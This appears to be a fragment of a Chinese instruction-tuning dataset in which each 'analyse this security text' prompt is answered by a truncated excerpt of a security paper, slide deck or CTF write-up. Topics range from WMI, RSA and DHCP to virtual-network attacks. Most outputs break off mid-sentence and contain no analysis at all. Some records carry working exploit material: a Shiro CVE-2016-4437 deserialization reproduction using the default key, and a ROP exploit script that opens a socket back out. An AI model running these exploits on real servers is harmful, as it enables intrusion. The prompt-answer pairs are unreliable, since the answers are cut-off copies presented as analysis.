(如果你不理解这些术语请不要担心请继续阅读)WQL 是 WMI 基础 SQL 语法因此 不区分大小写一个简单查询 BIOS 信息语句如下 Repositories存储类的所有静态数据的数据库存储库由 MOF (managed object format托管 对象格式) 文件定义MOF 文件定义了结构类名称空间等可以在 %WINDIR%\\System32\\Wbem\\Repository 目录下找到数据库文件 MOF 文件MOF 文件基本上用于定义 WMI 命名空间类provider 等通常位于 %WINDIR%\\System32\\Wbem 下扩展名为 MOF在本系列的后续部分中我们将了解如何编写自 己的 MOF 文件来扩展 WMI 功能集 select * from win32_bios Providers可以在 WMI Providers 的帮助下访问存储库中定义的任何内容它们通常是 Dll 文 件并与 MOF 文件 (cimwin32.dllstdprov.dll 等) 关联不过它们也可以采用其它类型 (类 事件事件使用者方法等) 的形式Providers 对生态系统至关重要因为它们监视来自特定定义 对象的事件和数据比如驱动程序它在托管对象和 WMI 之间提供了一个桥梁在下面的截图 中dll 文件都有相对应的 MOF 文件 Managed Objects上下文中资源的别名即托管对象可以是 WMI 管理的服务进程或操作系 统 Namespaces简言之名称空间是类的逻辑划分便于发现和使用分为 3 组 (systemcore extension) 和 3 个类型 (abstractstaticdynamic)默认情况下具有代表性的名称空间是 root\\cimv2root\\defaultroot\\securityroot\\subscription 等 体系架构基本就是这样现在让我们来了解如何将 WMI 与 PowerShell 一起使用 二用 PowerShell 来操作 WMI 现在我们已经完成了理论部分让我们快速生成一个 PS 终端请务必记住在 PowerShell 的 v2 之 前只有少数 cmdlet 可以与 WMI 交互检查 PowerShell 版本并将版本更改为 2 现在让我们在 PowerShell 提示符中运行 Get-Command--CommandTy", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploring Layer 2 Network Security in Virtualized Environments Ronny L. Bull & Jeanna N. Matthews Road Map  2015 Ronny L. Bull - Clarkson University  Context for the Problem of Layer 2 Network Security in Virrtualized Environments  Virtualization, Multi-tenant environments, Cloud services  Physical networking basics  Virtual networking basics  Test platforms  Array of virtual networking implementations tested  Specific attacks and results  MAC Flooding, DHCP Attacks  Mitigations  Next steps and conclusions Virtualization Overview  2015 Ronny L. Bull - Clarkson University Virtual Networking  2015 Ronny L. Bull - Clarkson University Multi-Tenancy  2015 Ronny L. Bull - Clarkson University What If?  2014 Ronny L. Bull - Clarkson University Multi-Tenant Cloud Services  2015 Ronny L. Bull - Clarkson University  Amazon EC2  Microsoft Azure  Google Cloud Services  Countless fly by night VPS hosting providers online  Brick and mortar data centers serving local clients  Similarities  Most run some form of Xen (OS Xen, XenServer)  Some use VMWare or Hyper-V  All share network connectivity between tenants Key Question  2015 Ronny L. Bull - Clarkson University  Since all client virtual machines are essentially connected to a virtual version of a physical networking device, do Layer 2 network attacks that typically work on physical devices apply to their virtualized counterparts?  Important question to explore:  All cloud services that rely on virtualized environments could be vulnerable  This includes data centers hosting mission critical or sensitive data!  Not the only class of attacks from co-located VMs  Old lesson: vulnerable to those close to you Bottom Line  2015 Ronny L. Bull - Clarkson University  Initial research experiments show that virtualized network devices DO have the potential to be exploited in the same manner as physical devices  In fact some of these environments allow the attack to spill out of the virtualized network and affect the physical networks they ar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYou Cannot See Me unohope [at] chroot.org 講師簡介 講師簡介 講師簡介 講師簡介 Unohope (unohope [at] chroot.org) 研究方向 研究方向 研究方向 研究方向 Web Application Security Network Security Network Security Multimedia Security 相關經歷 相關經歷 相關經歷 相關經歷 經歷 Hacks In Taiwan Conference 2005 Speaker 經歷 Hacks In Taiwan Conference 2006~2008 Wargame Designer 經歷 Chroot Security Group (http://www.chroot.org) 經歷 企業學術及政府等單位資安教育訓練講師 經歷 網駭科技 WARGAME 教育訓練講師 著作 THE WARGAME 駭客訓練基地 證照 EC-Council Certified Ethical Hacker 兩隻蜥蜴還是兩隻壁虎 兩隻蜥蜴還是兩隻壁虎 兩隻蜥蜴還是兩隻壁虎 兩隻蜥蜴還是兩隻壁虎? To see is to believe Surf the Internet every day Maybe you are an accessory Malicious Web Browser Attack 灌籃高手 灌籃高手 灌籃高手 灌籃高手   控制籃下就等於控制了整場比賽 控制籃下就等於控制了整場比賽 控制籃下就等於控制了整場比賽 控制籃下就等於控制了整場比賽 駭客高手 駭客高手 駭客高手 駭客高手   控制瀏覽器就等於控制了使用者 控制瀏覽器就等於控制了使用者 控制瀏覽器就等於控制了使用者 控制瀏覽器就等於控制了使用者 Features 竄改資料 竄改資料 竄改資料 竄改資料 顯示的資訊 顯示的資訊 顯示的資訊 顯示的資訊 擾亂視聽的資訊 擾亂視聽的資訊 擾亂視聽的資訊 擾亂視聽的資訊 送出的表單 送出的表單 送出的表單 送出的表單 送出的表單 送出的表單 送出的表單 送出的表單 串改傳送數值 串改傳送數值 串改傳送數值 串改傳送數值 修改接收網址 修改接收網址 修改接收網址 修改接收網址 啟用的元件 啟用的元件 啟用的元件 啟用的元件 安裝 安裝 安裝 安裝/執行惡意元件 執行惡意元件 執行惡意元件 執行惡意元件 連線劫持 連線劫持 連線劫持 連線劫持 更有效率的攻擊方式 更有效率的攻擊方式 更有效率的攻擊方式 更有效率的攻擊方式 優點 優點 優點 優點 免利用任何網站弱點 免利用任何網站弱點 免利用任何網站弱點 免利用任何網站弱點 SQL Injection Cross Site Scripting Cross-Site Request Forgery Cross-Site Request Forgery etc  輕易繞過多種認證 輕易繞過多種認證 輕易繞過多種認證 輕易繞過多種認證 Captcha Sign-In Seal One Time Password Certification IC Card etc  缺點 缺點 缺點 缺點 必須用戶端執行 必須用戶端執行 必須用戶端執行 必須用戶端執行 (Software, Plug-in, Spyware, etc) DEMO1 展示內容 展示內容 展示內容 展示內容: 擾亂使用者視聽 擾亂使用者視聽 擾亂使用者視聽 擾亂使用者視聽 適用對象 適用對象 適用對象 適用對象: 所有網站 所有網站 所有網站 所有網站 信用卡側錄與盜刷 信用卡側錄與盜刷 信用卡側錄與盜刷 信用卡側錄與盜刷 在加油站刷卡加油要特別留意國 道公路警察局破一起盜刷集團派遣 成員應徵進入加油站當工讀生 充當盜刷集團的臥底來側錄顧客信 用卡內碼並且製作成偽卡到各大 百貨盜刷盜刷金額高達上億元 百貨盜刷盜刷金額高達上億元 警方發現嫌犯當中竟然還有一位 是自稱是參與救治邵曉鈴的醫護人 員 嫌犯被捕時坐在地上不發一語 隨後警方搜出偽造信用卡數百張 還有內碼燒錄器印卡機甚至連 防偽標籤都有可見集團犯眾手法 相當精細 DEMO2 展示內容 展示內容 展示內容 展示內容: 竊取傳遞的資訊 竊取傳遞的資訊 竊取傳遞的資訊 竊取傳遞的資訊 適用對象 適用對象 適用對象 適用對象: 各種線上金流網站 各種線上金流網站 各種線上金流網站 各種線上金流網站 ESafe, GreenWorld, EzPos, etc ESafe, GreenWorld, EzPos, etc 各種線上購物網站 各種線上購物網站 各種線上購物網站 各種線上購物網站 PChome, Yahoo, PayEasy, ETMal", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### RSA 介绍概述 RSA 加密算法是一种非对称加密算法在公开密钥加密和电子商业中 RSA 被广泛使用RSA 是 1977 年由罗纳德李维斯特Ron Rivest阿迪萨莫尔Adi Shamir和伦纳德阿德曼Leonard Adleman一起提出的RSA 就是他们三人姓氏开头字母拼在一起组成的 RSA 算法的可靠性由极大整数因数分解的难度决定换言之对一极大整数做因数分解愈困难RSA 算法愈可靠假如有人找到一种快速因数分解的算法的话那么用 RSA 加密的信息的可靠性就肯定会极度下降但找到这样的算法的可能性是非常小的如今只有短的 RSA 密钥才可能被强力方式解破到 2017 年为止还没有任何可靠的攻击 RSA 算法的方式 ### RSA公钥与私钥的产生 1. 随机选择两个不同大质数 $p$ 和 $q$计算 $N = p \\times q$ 2. 根据欧拉函数求得 $\\varphi (N)=\\varphi (p)\\varphi (q)=(p-1)(q-1)$ 3. 选择一个小于 $\\varphi (N)$ 的整数 $e$使 $e$ 和 $\\varphi (N)$ 互质并求得 $e$ 关于 $\\varphi (N)$ 的模反元素命名为 $d$有 $ed\\equiv 1 \\pmod {\\varphi (N)}$ 4. 将 $p$ 和 $q$ 的记录销毁 此时$(N,e)$ 是公钥$(N,d)$ 是私钥 ### RSA消息加密 首先需要将消息 以一个双方约定好的格式转化为一个小于 $N$且与 $N$ 互质的整数 $m$如果消息太长可以将消息分为几段这也就是我们所说的块加密后对于每一部分利用如下公式加密 $$ m{e}\\equiv c\\pmod N $$ ### RSA消息解密 利用密钥 $d$ 进行解密 $$ c{d}\\equiv m\\pmod N $$ ### RSA正确性证明 即我们要证$m{ed} \\equiv m \\bmod N$已知$ed \\equiv 1 \\bmod \\phi(N)$那么 $ed=k\\phi(N)+1$即需要证明 $$ m{k\\phi(N)+1} \\equiv m \\bmod N $$ 这里我们分两种情况证明 第一种情况 $gcd(m,N)=1$那么 $m{\\phi(N)} \\equiv 1 \\bmod N$因此原式成立 第二种情况 $gcd(m,N)\\neq 1$那么 $m$ 必然是 $p$ 或者 $q$ 的倍数并且 $n=m$ 小于 $N$我们假设 $$ m=xp $$ 那么 $x$ 必然小于 $q$又由于 $q$ 是素数那么 $$ m{\\phi(q)} \\equiv 1 \\bmod q $$ 进而 $$ m{k\\phi(N)}=m{k(p-1)(q-1)}=(m{\\phi(q)}){k(p-1)} \\equiv 1 \\bmod q $$ 那么 $$ m{k\\phi(N)+1}=m+uqm $$ 进而 $$ m{k\\phi(N)+1}=m+uqxp=m+uxN $$ 所以原式成立 ### RSA实用工具RSAtool - 安装 ```bash git clone https://github.com/ius/rsatool.git cd rsatool python rsatool.py -h ``` - 生成私钥 ```bash python rsatool.py -f PEM -o private.pem -p 1234567 -q 7654321 ``` ### RSA实用工具RSA Converter - 根据给定密钥对生成 pem 文件 - 根据 $n$$e$$d$ 得出 $p$$q$ ### RSA实用工具openssl - 查看公钥文件 ```shell openssl rsa -pubin -in pubkey.pem -text -modulus ``` - 解密 ```shell rsautl -decrypt -inkey private.pem -in flag.enc -out flag ``` 更加具体的细节请参考 `openssl --help` ### RSA分解整数工具 - 网站分解[factor.db](http://factordb.com/) - 命令行分解[factordb-pycli](https://github.com/ryosan-470/factordb-pycli)借用 factordb 数据库 - [yafu](https://sourceforge.net/projects/yafu/) ### RSA相关python 库 #### primefac 整数分解库包含了很多整数分解的算法 #### gmpy - `gmpy.root(a, b)`返", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437 Apache Shiro是一款开源安全框架提供身份验证授权密码学和会话管理Shiro框架直观易用同时也能提供健壮的安全性 Apache Shiro 1.2.4及以前版本中加密的用户信息序列化后存储在名为remember-me的Cookie中攻击者可以使用Shiro的默认密钥伪造用户Cookie触发Java反序列化漏洞进而在目标机器上执行任意命令 ## 漏洞环境 执行如下命令启动一个使用了Apache Shiro 1.2.4的Web服务 ``` docker compose up -d ``` 服务启动后访问`http://your-ip:8080`可使用`admin:vulhub`进行登录 ## 漏洞复现 使用ysoserial生成CommonsBeanutils1的Gadget ``` java -jar ysoserial-master-30099844c6-1.jar CommonsBeanutils1 \"touch /tmp/success\" > poc.ser ``` 使用Shiro内置的默认密钥对Payload进行加密 ```java package org.vulhub.shirodemo; import org.apache.shiro.crypto.AesCipherService; import org.apache.shiro.codec.CodecSupport; import org.apache.shiro.util.ByteSource; import org.apache.shiro.codec.Base64; import org.apache.shiro.io.DefaultSerializer; import java.nio.file.FileSystems; import java.nio.file.Files; import java.nio.file.Paths; public class TestRemember { public static void main(String[] args) throws Exception { byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath(\"/path\", \"to\", \"poc.ser\")); AesCipherService aes = new AesCipherService(); byte[] key = Base64.decode(CodecSupport.toBytes(\"kPH+bIxk5D2deZiIxcaaaA==\")); ByteSource ciphertext = aes.encrypt(payloads, key); System.out.printf(ciphertext.toString()); } } ``` 发送rememberMe Cookie即可成功执行`touch /tmp/success` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSatellite Imagery Analysis Greg Conti gjconti@rumint.org image: nasa.gov The views expressed in this presentation are those of the author and do not reflect the official policy or position of the United States Military Academy, the Department of the Army, the Department of Defense or the U.S. Government. http://ehp.niehs.nih.gov/docs/2003/111-2/prison.jpg http://googlesightseeing.com/2006/11/28/top-10-naked-people-on-google-earth/ http://maps.google.com/maps?um=1&tab=wl&hl=en&q=google%20street%20level%20view http://streetviewgallery.corank.com/tech/all/cat/upcoming/people image: http://maps.google.com/ http://maps.google.com/ Be sure to photograph EFF attorneys http://blog.wired.com/27bstroke6/2007/06/eff_privacy_adv.html Checkbook Shutter Control \"I could certainly foresee circumstances in which we would not want imagery to be openly disseminated of a sensitive site of any type, whether it is here or overseas,\" - Robert Muttett, director National Geospatial-Intelligence Agency With the help of about $1 billion from Murrett's agency, the companies [DigitalGlobe GeoEye] plan to launch new satellites with higher resolutions later this year. While the public will begin to see crisper images online and elsewhere, government regulations will require the companies to degrade the quality of the imagery to a half-meter resolution. http://www.komotv.com/news/tech/7404181.html Imagery Analysis  Understand capabilities and limitations of sensors and platforms  Image quality and realistic expectations  Build smart books  Combine multiple sources and times  Seek out domain experts  Collaborative analysis  Combine with other forms of information  Reverse engineering a city  Watching the watcher  A look to the future Keplerian Elements  Epoch  Orbital Inclination  Right Ascension of Ascending Node  Argument of Perigee  Eccentricity  Mean Motion  Mean Anomaly  Drag (optional) http://www.amsat.org/amsat/keps/kepmodel.html Example of Imagery Sat Keps  commercial imagery sat (graphic ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploiting Windows Exploit Mitigation for ROP Exploits Omer Yair DEF CON 27  Omer Yair  TDAD Endpoint Team Lead at Symantec  Speaker at DerbyCon, Virus Bulletin, Zero Nights  Photography BFA Graduate  Exhibited at multiple exhibitions  Photo book in the makings  @yair_omer Who Am I? Vote Sloth by Grant Shepley A concept is a brick. It can be used to build a courthouse of reason. Or it can be thrown through the window. Gilles Deleuze Return Oriented Programming 101 Windows Exploit Mitigations and how to abuse them ROP Mitigations and how to bypass them Demo Agenda Return Oriented Programming - Timeline Smashing The Stack For Fun And Profit 1996 Smashing the Stack For Fun And Profit Aleph One (Elias Levy) 1996 Street fight against British soldiers, Northern Ireland. Bruno Barbey, 1971 FuncFirst: ... 0x7F200100 push 0x22002200 0x7F200101 push 0x00110011 0x7F200102 call FuncSecond 0x7F200107 ... FuncSecond: 0x7F204C00 sub esp, 0x8 0x7F204C03 ... 0x7F204D19 add esp, 0x8 0x7F204D1C ret Stack Semantics (x86) 0x00802000 0x00804000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x7F400123 0x00C0FFEE 0x00000000 0x00000000 0x00000000 FuncFirst: ... 0x7F200100 push 0x22002200 0x7F200101 push 0x00110011 0x7F200102 call FuncSecond 0x7F200107 ... FuncSecond: 0x7F204C00 sub esp, 0x8 0x7F204C03 ... 0x7F204D19 add esp, 0x8 0x7F204D1C ret Stack Semantics (x86) 0x00802000 0x00804000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x22002200 0x7F400123 0x00C0FFEE 0x00000000 0x00000000 0x00000000 FuncFirst: ... 0x7F200100 push 0x22002200 0x7F200101 push 0x00110011 0x7F200102 call FuncSecond 0x7F200107 ... FuncSecond: 0x7F204C00 sub esp, 0x8 0x7F204C03 ... 0x7F204D19 add esp, 0x8 0x7F204D1C ret Stack Semantics (x86) 0x00802000 0x00804000 0x00000000 0x00000000 0x00000000 0x00000000 0x00110011 0x22002200 0x7F400123 0x00C0FFEE 0x00000000 0x00000000 0x00000000 FuncFirst: ... 0x7F200100 push 0x22002200 0x7F200101 push 0x00110011 0x7F200102 call FuncSecond 0x7F200107 .", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Intelligent Debugging for Vulnerability Analysis and Exploit Development Security Research 2 Who am I?  Damian Gomez, Argentina  Being working @ Immunity since early 2006  Security Research focusing on:  Vulnerability analysis  Exploit development  VisualSploit lead developer  Main developer of Immunity Debugger project 3 Introduction An exploit may be coded in multiples languages: - Pascal - Fortran - Lisp - Brainfuck - Cupid - Gap - Kermit - Java - Asm - C - Python - Perl - Shellscript - PHP - Cobol - Foxpro - zmud! - whitespace - yacc - smalltalk - C# - C++ - C-- - C - C-smile - Cocoa - Coffee - Clipper - Delphi - B - A - C 4 - Clist - Kalkulon - ABC - ADA - ALF - Batch - TOM - OZ - Modula-3 - Lingo - Fortress - elastiC - D - cT - AWK - Felix - Guile - MC# - VisualBasic - Nemerle - Objetive-C - Phantom - Prolog - Simula - Snobol - Turing - Blue - Quickbasic - Ruby - S - Obliq - GNU E - COMAL - NetRexx - PL/B - Sather 5 etc 6 Immunity VisualSploit introduced a graphical domain-specific language for exploit development 7 Exploits are a functional representation of Intelligent Debugging Exploit Input Crafting Heap Analysis Memory state manipulation Protocol Analysis 8 We want a debugger with a rich API for exploit development  Simple, understandable interface  Robust and powerful scripting language for automating intelligent debugging  Lightweight and fast debugging so as not to corrupt our results when doing complex analysis  Connectivity to fuzzers and other exploit development tools 9 No one user interface model is perfect for all exploit development situations  These three main characteristics will help us achieve what we want:  GUI  Command Line  Scripting language 10 A debugger's GUI can take weeks off the time it takes to write an exploit  Easy visualization of debugee context  Does EAX point to a string I control? Yes!  Faster to learn for complex commands  Downside: Slower usage than commandline due to mice 11 The command line is the faster option  Exampl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Stage 2 ## Description > This image is intentionally distorted. > > Fix it to have the key to the next stage. > > Hint: Once the first step is clear, 1f8b. ![](images/index.jpg) ## Solution This is a JPG image: ```console root@kali:/media/sf_CTFs/ebay/2# file index.jpg index.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 640x480, components 3 ``` `jpeginfo` confirms that it's corrupted: ```console root@kali:/media/sf_CTFs/ebay/2# jpeginfo -c index.jpg index.jpg 640 x 480 24bit JFIF N 6850 Corrupt JPEG data: premature end of data segment [WARNING] ``` If we open the file with a hex-editor and scroll through it, we eventually see this: ```console root@kali:/media/sf_CTFs/ebay/2# xxd -g 1 -s 0x12d0 -l 352 index.jpg 000012d0: 00 00 00 00 00 00 00 00 0a 79 14 da f1 15 ca f1 .........y...... 000012e0: 48 9f d5 6e bb 98 fd 84 ae e1 c7 cf 8f 5e a9 1e H..n........... 000012f0: 73 eb 69 f3 99 fd e4 24 c5 93 31 11 dc fa 40 af s.i....$..1...@. 00001300: 52 45 4d 4f 56 45 5f 4d 45 5f 52 45 4d 4f 56 45 REMOVE_ME_REMOVE 00001310: 5f 4d 45 5f 52 45 4d 4f 56 45 5f 4d 45 5f 52 45 _ME_REMOVE_ME_RE 00001320: 4d 4f 56 45 5f 4d 45 5f 52 45 4d 4f 56 45 5f 4d MOVE_ME_REMOVE_M 00001330: 45 5f 52 45 4d 4f 56 45 5f 4d 45 5f 52 45 4d 4f E_REMOVE_ME_REMO 00001340: 56 45 5f 4d 45 5f 52 45 4d 4f 56 45 5f 4d 45 5f VE_ME_REMOVE_ME_ 00001350: 52 45 4d 4f 56 45 5f 4d 45 5f 52 45 4d 4f 56 45 REMOVE_ME_REMOVE 00001360: 5f 4d 45 5f 52 45 4d 4f 56 45 5f 4d 45 5f 52 45 _ME_REMOVE_ME_RE 00001370: 4d 4f 56 45 5f 4d 45 5f 52 45 4d 4f 56 45 5f 4d MOVE_ME_REMOVE_M 00001380: 45 5f 52 45 4d 4f 56 45 5f 4d 45 5f 52 45 4d 4f E_REMOVE_ME_REMO 00001390: 56 45 5f 4d 45 5f 52 45 4d 4f 56 45 5f 4d 45 5f VE_ME_REMOVE_ME_ 000013a0: 52 45 4d 4f 56 45 5f 4d 45 5f 52 45 4d 4f 56 45 REMOVE_ME_REMOVE 000013b0: 5f 4d 45 5f 52 45 4d 4f 56 45 5f 4d 45 5f 52 45 _ME_REMOVE_ME_RE 000013c0: 4d 4f 56 45 5f 4d 45 5f 52 45 4d 4f 56 45 5f 4d MOVE_ME_REMOVE_M 000013d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Baby RSA (crypto, 74p, 137 solved) In the challenge we get [code](rsa.sage), the [public key](pubkey.py) and the [result](flag.enc). Encryption is rather simple: ```python R.<a> = GF(22049) def encrypt(m): global n assert len(m) <= 256 m_int = Integer(m.encode('hex'), 16) m_poly = P(R.fetch_int(m_int)) c_poly = pow(m_poly, e, n) c_int = R(c_poly).integer_representation() c = format(c_int, '0256x').decode('hex') return c ``` It seems the `n` here is a polynomial in PolynomialRing over GF(2). The encryption basically changes the message into element of GF(22049) and then represent this as element of the ring P, then raises this polynomial representation of the message to the power of `e` mod polynomial `n`. So it really boils down to the classic RSA, with the small twist that `m` and `n` are now polynomials and everything is calcualted in PolynomialRing over GF(2). We found a very good paper describing this idea: http://www.diva-portal.se/smash/get/diva2:823505/FULLTEXT01.pdf (BSc thesis of Izabela Beatrice Gafitoiu). If we follow this thesis we will find that in this setting the `d` decryption exponent can be calculated as modular multiplicative inverse of `e` mod `s`. The special value `s` is the equivalent of `phi` from classic RSA, and is basically `(2p_d-1)(2q_d-1)` where `p_d` and `q_d` are degrees of polynomials `p` and `q` such that `p*q == n`. So the idea is pretty simple: 1. Factor polynomial `n` into `p` and `q` 2. Calculate `s` 3. Calculate `d` 4. Decrypt the flag ```python def decrypt(m, d): m_int = Integer(m.encode('hex'), 16) m_poly = P(R.fetch_int(m_int)) c_poly = pow(m_poly, d, n) c_int = R(c_poly).integer_representation() c = format(c_int, '0256x').decode('hex') return c if __name__ == '__main__': p,q = n.factor() p,q = p[0],q[0] s = (2p.degree()-1)*(2q.degree()-1) d = inverse_mod(e,s) with open('flag.enc', 'rb') as f: ctext = f.read() print(decrypt(ctext,d)) ``` And we get `flag{P1ea5e_k33p_N_as_A_inTegeR~~~~~~}`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndhcpd === 运行DHCP服务器 ### 语法 ```shell dhcpd [选项] [网络接口] ``` ### 选项 ```shell -p <端口> 指定dhcpd监听的端口 -f 作为前台进程运行dhcpd -d 启用调试模式 -q 在启动时不显示版权信息 -t 简单地测试配置文件的语法是否正确的但不会尝试执行任何网络操作 -T 可以用来测试租约数据库文件 -4 运行DHCP服务器 -6 运行DHCPv6服务器 -s <服务器> 指定发送回复的服务器 -cf <配置文件> 指定配置文件 -lf <租约文件> 指定租约文件 -pf <PID文件> 指定PID文件 -tf <跟踪输出文件> 指定文件记录DHCP服务器的整个启动状态 ``` ### 例子 对DHCP服务器进行排错 ```shell [root@localhost ~]# dhcpd InternetSystems Consortium DHCP Server 4.1.1-P1 Copyright2004-2010 Internet Systems Consortium. All rightsreserved. For info,please visit https://www.isc.org/software/dhcp/ Not searchingLDAP since ldap-server, ldap-port and ldap-base-dn were not specified in theconfig file Wrote 0deleted host decls to leases file. Wrote 0 newdynamic host decls to leases file. Wrote 1leases to leases file. Listening onLPF/eth0/00:0c:29:fc:2f:e5/192.168.0.0/24 Sendingon LPF/eth0/00:0c:29:fc:2f:e5/192.168.0.0/24 Sendingon Socket/fallback/fallback-net [root@rhel~]# There's already a DHCP server running. This versionof ISC DHCP is based on the release available onftp.isc.org. Features have been addedand other changes have beenmade to the base software release in order to make it workbetter with this distribution. exiting. ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPWNHUB CTF WriteUp By Nu1L PWNHUB CTF WriteUp By Nu1L Pwn ezrop Reverse brain letsgo Crypto rootRSA ezRSA ezmat Web EzPDFParser264 easyCMS baby_flask Misc 眼神得好 被偷的flag Game 是兄弟就来砍我 初径 擂台决 Other 签到 MEDIUMBLACKOCR WORDS_CHECK Ppc BABY LINE HILBERT Pwn ezrop close(1) close(2) close(3) 发现有条gadget是add dword ptr [ebp-0x3d], ebx 可以来任意地址写且是偏移造个socket和connect出来重新打开fd后就好做了 from pwn import * s = process(\"./easyrop\") # s = remote(\"47.97.127.1\",\"23855\") p = listen(9999) elf = ELF(\"./easyrop\") # libc = ELF(\"./libc-2.27.so\") libc = ELF(\"./libc-2.31.so\") bss = elf.bss(0x500) add_rbp_3d = 0x0000000000400618 pop_rbx_rbp_4 = 0x4008FA pop_rdi = 0x0000000000400903 pop_rsi_r15 = 0x0000000000400901 pop_rsp_3 = 0x00000000004008fd pop_rbp = 0x00000000004005b8 leave_ret = 0x0000000000400821 pts = \"/dev/pts/3\" csu_func = 0x4008E0 def setReg(rbx,rbp,rdi,rsi,rdx,func): return p64(rbx)+p64(rbp)+p64((func- rbx*8)&0xffffffffffffffff)+p64(rdi)+p64(rsi)+p64(rdx) #make syscall,alarm -> syscall # gdb.attach(s,\"b *0x400904\\nc\") payload = 'A'*8+p64(1)+p64(pop_rbx_rbp_4)+p64(0x0f270002)+p64(bss+0x3d)+p64(0)*4+p64(add_rbp_3d) payload += p64(pop_rbx_rbp_4)+p64(0xbf376627)+p64(bss+4+0x3d)+p64(0)*4+p64(add_rbp_3d) # payload += p64(pop_rbx_rbp_4)+p64(0x0100007f)+p64(bss+4+0x3d)+p64(0)*4+p64(add_rbp_3d) payload += p64(pop_rbx_rbp_4)+p64(libc.sym['socket']- libc.sym['alarm'])+p64(elf.got['alarm']+0x3d) payload += setReg(libc.sym['socket']-libc.sym['alarm'],1,2,1,0,elf.got['alarm'])[2*8:] payload += p64(add_rbp_3d)+p64(pop_rbp)+p64(libc.sym['socket']-libc.sym['alarm']+1) payload += p64(csu_func) payload += 'A'*8+setReg(libc.sym['connect']- libc.sym['close'],elf.got['close']+0x3d,0,bss,16,elf.got['close']) payload += p64(add_rbp_3d)+p64(pop_rbp)+p64(libc.sym['connect']-libc.sym['close']+1) payload += p64(csu_func) payload += 'A'*8+setReg(0,1,0,bss,0x300,elf.got['read'])+p64(csu_func) payload += 'A'*8+setReg(0,bss-8,0,0,0,0)+p64(leave_ret) s.send(payload) success(hex(len(payload))) raw_input(\">\") context.arch='amd", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInformation Leakage or Call a Plumber --- your Info is Leaking Joe Klein, CISSP Sr. Security Engineer, AVAYA kleinj@avaya.com Overview  Background for this Speech  What is Information Leakage?  What is the Risk?  Types of Information Leakage?  Technical  People  Process  How to Protect? Background of the speech  Art of War   Not know yourself nor the enemy, you are lost  Knows yourself, but not the enemy and you are not likely to win  One who knows themselves and the enemy is certain to win Sophistication of Attacker vs Level or Protection Level of Protection None Average High Sophistication of Attacker Low Mid High Unsuccessful Attack Discovered Successful Attack Undiscovered Legal/Regulatory Requirements Best Practices Perfect Security What is Information Leakage(IL)? Information which is released purposefully or accidentally, placing your staff, intellectual property, systems and networks at risk. What is the Risk of IL?  Greatly improves the success of an attacker  Places the organization at a competitive disadvantage  Places organization at legal risk  Can lead to physical harm of staff and facilities Types of Information Leakage? Technology People Process Technical  Passive  Listening  Sniffers, scanning frequencies  Active  Integration  War driving, war dialing, scanning networks Technical  Layer 2  Mac Address, SSID, Frequency Used  Identify Make of systems  Layer 3  Active  nmap, qoso, xprobe, icmp, packeto  Passive  Sniffers, Kismet, radio scanner, etc Technical  Layer 4 and above  SNMP  System  processes, software, configurations  Network  internal networks, routes, protocols  Application Servers  Web sites: http://www.netcraft.com/  Chat, E-mail, Usenet, Mailing Lists  Look at header information of posting  Applications  See BH 2003 - - for details Technical  Special Cases  Firewalls  Firewalk  Firewall Fingerprint papers  Tempest  Emissions  Electro Magnetic  Other  Surveillance Devices People  Posting information on website  http://www.target.com  http", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# druid 监控页未授权访问漏洞 ## 漏洞简介 Druid是阿里巴巴数据库出品的为监控而生的数据库连接池并且Druid提供的监控功能监控SQL的执行时间监控Web URI的请求Session监控首先Druid是不存在什么漏洞的但当开发者配置不当时就可能造成未授权访问. ## 环境搭建 pom.xml配置 ``` <?xml version=\"1.0\" encoding=\"UTF-8\"?> <project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd\"> <modelVersion>4.0.0</modelVersion> <parent> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-parent</artifactId> <version>2.6.3</version> <relativePath/> <!-- lookup parent from repository --> </parent> <groupId>com.example</groupId> <artifactId>demo</artifactId> <version>0.0.1-SNAPSHOT</version> <name>demo</name> <description>Demo project for Spring Boot</description> <properties> <java.version>1.8</java.version> </properties> <dependencies> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-jdbc</artifactId> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> </dependency> <dependency> <groupId>org.mybatis.spring.boot</groupId> <artifactId>mybatis-spring-boot-starter</artifactId> <version>2.2.2</version> </dependency> <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java</artifactId> <scope>runtime</scope> </dependency> <dependency> <groupId>org.springframework.boot</groupId> 